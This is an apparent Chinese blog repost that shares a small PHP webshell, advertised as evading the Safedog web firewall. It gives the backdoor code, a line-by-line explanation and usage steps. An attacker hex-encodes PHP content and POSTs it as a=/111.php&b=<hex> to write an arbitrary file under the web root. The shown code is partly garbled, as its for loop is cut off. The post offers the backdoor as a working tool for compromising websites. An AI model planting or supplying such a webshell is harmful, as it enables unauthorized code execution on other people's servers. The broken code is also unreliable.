zoukankan      html  css  js  c++  java
  • 分享PHP小马一枚,完美绕过安全狗检测。

    没做免杀之前,被狗咬死:

    直接上代码:

    $p=realpath(dirname(__FILE__)."/../").$_POST["a"];
    $t=$_POST["b"];
    $tt="";
    for ($i=0;$i @fwrite(fopen($p,"w"),$tt);
    echo "success!";
    ?>

    代码分析:

    $p=realpath(dirname(__FILE__)."/../").$_POST["a"]; //定义$p为根目录的物理路径+$_POST["a"]的内容
    $t=$_POST["b"]; //定义$t为$_POST["b"]的内容
    $tt=""; //定义$tt为空
    for ($i=0;$i
     @fwrite(fopen($p,"w"),$tt); //写入文件地址是$p,内容是$tt
    echo "success!";
    ?>

    利用方法:

    将写入的内容用url编码,比如,编码后为:%3C%3F%70%68%70%20%70%68%70%69%6E%66%6F%28%29%3B%3F%3E。去掉其中的%,得到:3C3F70687020706870696E666F28293B3F3E。

    然后访问后门,将POST内容改为:a=/111.php&b=3C3F70687020706870696E666F28293B3F3E,即可写入内容。

    成功过狗:

  • 相关阅读:
    C++中的类模板详细讲述
    函数模板和模板函数
    vs2008 快捷键大全
    #宏定义##
    多工程项目设置
    conemu 配置
    itcast-svn
    itcast-spring-三大框架整合
    Spring通知方法错误
    动态代理
  • 原文地址:https://www.cnblogs.com/h4ck0ne/p/5154568.html
Copyright © 2011-2022 走看看